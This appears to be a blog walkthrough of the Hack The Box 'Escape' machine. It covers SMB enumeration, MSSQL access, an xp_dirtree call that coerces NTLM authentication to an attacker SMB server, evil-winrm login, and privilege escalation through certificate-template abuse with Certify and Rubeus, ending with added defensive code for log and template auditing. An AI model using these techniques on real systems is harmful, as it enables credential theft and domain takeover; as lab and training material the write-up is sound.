In this post, I would like to share a walkthrough of the Escape machine from Hack The Box.
This machine is rated medium on Hack The Box.
What will you gain from the Escape machine?
For the user flag, you need to obtain the database credentials stored inside a PDF file on an SMB share. With those, we issue a SQL command that makes the SQL Server service authenticate to our own SMB server, which hands us an NTLMv2 hash. After cracking it, we gain access to the server with evil-winrm. Next, we obtain another set of credentials from the SQL Server error log backup.
As for the root flag, you only need to retrieve the administrator's NTLM hash using tools such as Rubeus.exe and Certify.exe.
Information Gathering on Escape Machine
Once we have started the VPN connection (the configuration file is downloaded from Hack The Box), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -Pn
┌─[darknite@parrot]─[~/Document/htb/Escape]
└──╼ $nmap -sC -sV 10.10.11.202 -oA initial -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-03 02:17 EST
Nmap scan report for 10.10.11.202
Host is up (0.22s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-03 15:18:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-03T13:51:43
|_Not valid after: 2053-03-03T13:51:43
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.08 seconds
From the nmap result, I notice that there is no HTTP service (port 80) open on the machine. The host is a domain controller (dc.sequel.htb) that also runs Microsoft SQL Server 2019 on port 1433, and the clock skew of +8h against the scanner is worth noting for any Kerberos interaction later.
SMBclient enumeration
Let's enumerate the SMB shares on the machine; only the Public share catches my attention.
Therefore, let's access the share by using smbclient.
Inside it we find a PDF file that we can try to download to our attacker's machine.
Sadly, a plain download fails with the error "NT_STATUS_NO_SUCH_FILE".
The filename contains spaces, so once we wrap "SQL Server Procedures.pdf" in double quotes the download succeeds.
The two screenshots above show some useful information
Enumerate the server by running impacket-mssqlclient and impacket-smbserver
Using the credentials found earlier in the PDF, we start mssqlclient with the command "impacket-mssqlclient WORKGROUP/PublicUser:GuestCantWrite1@10.10.11.202".
Firstly, let's start our SMB server by executing the command "sudo impacket-smbserver <anyname> . -smb2support".
Then, inside the SQL session, we execute xp_dirtree '\\<yourIP>\<yourshare>'; the SQL Server service account tries to reach that path and authenticates to our SMB server.
As a result, we obtain an NTLMv2 hash that we can crack with John the Ripper.
The hash will look something like the one shown above.
Finally, the hash is cracked, giving us a username and password.
Accessing the Escape machine via evil-winrm
We should be able to access the machine via evil-winrm by entering the credentials that we found earlier: username = sql_server and password = REGGIE1234ronnie.
Nothing can be found within the Documents directory.
We find an SQL Server directory on the root of the drive, and there is some useful information hidden inside it.
A backup file, ERRORLOG.BAK, resides within the Logs directory.
There should be something in it that we can use for the later stage.
After analysing the logs carefully, I notice one credential that we can use to access the machine as a different user.
Finally, we can access the machine with the different credential.
We can read the user flag by using the "type user.txt" command.
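The error log stage above works because a failed logon attempt records whatever was typed in the username field, and a password typed there by mistake ends up in plain text. As an added example, not part of the original post, here is a defender-side check that parses SQL Server ERRORLOG "Logon failed" entries and flags the pattern (a wrong-password failure for a real account followed, from the same client, by a "no such login" failure for a name with no domain prefix). The log lines are constructed with placeholder account names; the real file from the machine is not reproduced.

```python
import re
from datetime import datetime, timedelta

# SQL Server ERRORLOG "Logon failed" entry layout (timestamp, source column, message).
LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?)\. "
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)
NO_SUCH_LOGIN = "Could not find a login matching the name provided"
BAD_PASSWORD = "Password did not match that for the login provided"

# Constructed sample log; account names and the leaked-looking value are placeholders.
SAMPLE_LOG = """\
2022-11-18 13:43:05.12 Logon       Logon failed for user 'sequel.htb\\svc.placeholder'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'NotARealPassw0rd!'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.5]
2022-11-18 13:50:01.00 Logon       Logon failed for user 'sequel.htb\\other.user'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.9]
2022-11-18 14:10:22.00 Logon       Logon failed for user 'sequel.htb\\other.user'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.9]
"""

def parse_logon_failures(text):
    """Return one dict per 'Logon failed' line with a parsed timestamp."""
    events = []
    for line in text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append(d)
    return events

def find_leaked_secrets(events, window=timedelta(seconds=60)):
    """Flag 'no such login' failures whose name has no domain prefix and which follow,
    within `window` from the same client, a bad-password failure for a real account.
    Returns (timestamp, client, account) tuples; the suspect string itself is not
    returned, so the finding can be logged without re-leaking the secret."""
    findings = []
    for i, ev in enumerate(events):
        if ev["reason"] != NO_SUCH_LOGIN or "\\" in ev["user"]:
            continue
        for prev in reversed(events[:i]):
            if ev["ts"] - prev["ts"] > window:
                break
            if prev["client"] == ev["client"] and prev["reason"] == BAD_PASSWORD:
                findings.append((ev["ts"], ev["client"], prev["user"]))
                break
    return findings
```

A hit means the account named in the finding should be treated as compromised and rotated, and the log file (including any .BAK copies) should not be readable by ordinary users.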
Escalate to Administrator Privileges Access
For this activity, we are required to have Certify.exe, which can be downloaded from the GhostPack Certify repository.
We should upload Certify.exe to the victim's machine.
To ensure the binary works, we can test it by executing it.
We should be able to find the vulnerable certificate template by using the Certify.exe command.
We can then request a certificate and private key through the vulnerable template, supplying the subject of our choice in the request.
Later, we can run openssl, saving the certificate as cert.pem and exporting it to cert.pfx.
As a result, we can upload cert.pfx to the victim's machine.
Also, we are required to upload Rubeus.exe to the victim's machine.
We should obtain the NTLM hash by running the Rubeus command with that certificate.
Boom! At last, we managed to access the machine as the Administrator user.
We can read the root flag by typing the "type root.txt" command.
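The privilege escalation above relies on a certificate template that lets the requester supply the subject while still allowing logon, with no approval step in between. As an added example, not part of the original post or of Certify, here is the audit logic an administrator would apply to template attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, the EKU list and a pre-resolved enrollment-rights check) to spot that combination, together with the two settings that remove it. The template records are constructed placeholders, not the machine's templates.

```python
# Flag values from the AD CS certificate template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval
# EKU OIDs that make a certificate usable for domain logon.
LOGON_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}

def esc1_risk(template):
    """Return the conditions present; the template is exposed only when all five hold."""
    reasons = []
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    if not template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if template["ra_signatures"] == 0:
        reasons.append("no authorized signatures required")
    ekus = set(template["ekus"])
    if not ekus or ekus & LOGON_EKUS:   # an empty EKU list means any purpose
        reasons.append("logon-capable EKU")
    if template["low_priv_enroll"]:     # assumed already resolved from the template ACL
        reasons.append("low-privileged enrollment")
    return reasons if len(reasons) == 5 else []

def hardened(template):
    """Copy of the template with the requester-supplied subject disabled and
    CA manager approval required, the two changes an admin would make first."""
    fixed = dict(template)
    fixed["name_flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["enrollment_flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed

# Constructed template records with placeholder names.
RISKY = {"name": "PlaceholderUserTemplate", "name_flag": 0x1, "enrollment_flag": 0x0,
         "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "low_priv_enroll": True}
SAFE = {"name": "PlaceholderWebServer", "name_flag": 0x1, "enrollment_flag": 0x0,
        "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.1"], "low_priv_enroll": True}
```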